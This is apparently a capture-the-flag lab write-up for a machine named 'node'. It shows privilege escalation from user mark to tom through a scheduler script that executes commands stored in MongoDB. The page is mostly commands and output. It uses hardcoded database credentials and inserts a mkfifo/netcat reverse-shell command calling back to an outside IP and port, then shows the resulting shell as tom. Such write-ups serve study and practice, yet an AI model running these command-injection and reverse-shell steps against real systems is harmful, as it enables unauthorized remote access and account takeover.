5 mark > tom

# explored a lot of stuff
# reusing password
# connecting mongo failed with mark creds

# looking at processes running as tom

mark@node:/opt$ ps fuaxwww | grep tom
mark     23909  0.0  0.1  14228   940 pts/0    S+   19:15   0:00              \_ grep --color=auto tom
tom       1225  5.5  5.7 1045320 43720 ?       Ssl  18:20   3:01 /usr/bin/node /var/www/myplace/app.js
tom       1229  0.0  4.0 1074616 30708 ?       Ssl  18:20   0:01 /usr/bin/node /var/scheduler/app.js
mark@node:/opt$ cat /var/scheduler/app.js
const exec        = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);

});
# this script runs like a CRON and checks for any new record that is entered 
# runs the value in the 'cmd' key.

$ mongosh --host localhost -u mark -p 5AYRft73VtFpc84k scheduler
Current Mongosh Log ID: 614a235a4a2af76aa870faa9
Connecting to:          mongodb://localhost:27017/scheduler?directConnection=true&serverSelectionTimeoutMS=2000
Using MongoDB:          3.2.16
Using Mongosh:          1.0.6

scheduler> show dbs
MongoServerError: not authorized on admin to execute command { listDatabases: 1 }
scheduler> show collections
tasks
scheduler> db.tasks.find({})

scheduler> db.tasks.insert({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.5 6969 >/tmp/f"})
DeprecationWarning: Collection.insert() is deprecated. Use insertOne, insertMany, or bulkWrite.
{
  acknowledged: true,
  insertedIds: { '0': ObjectId("614a24be65c51bfc6927c5cc") }
}
scheduler> db.tasks.find({})
[
  {
    _id: ObjectId("614a24be65c51bfc6927c5cc"),
    cmd: 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.5 6969 >/tmp/f'
  }
]

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.58] 32822
bash: cannot set terminal process group (1229): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

tom@node:/$ whoami;id
whoami;id
tom
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)

Last updated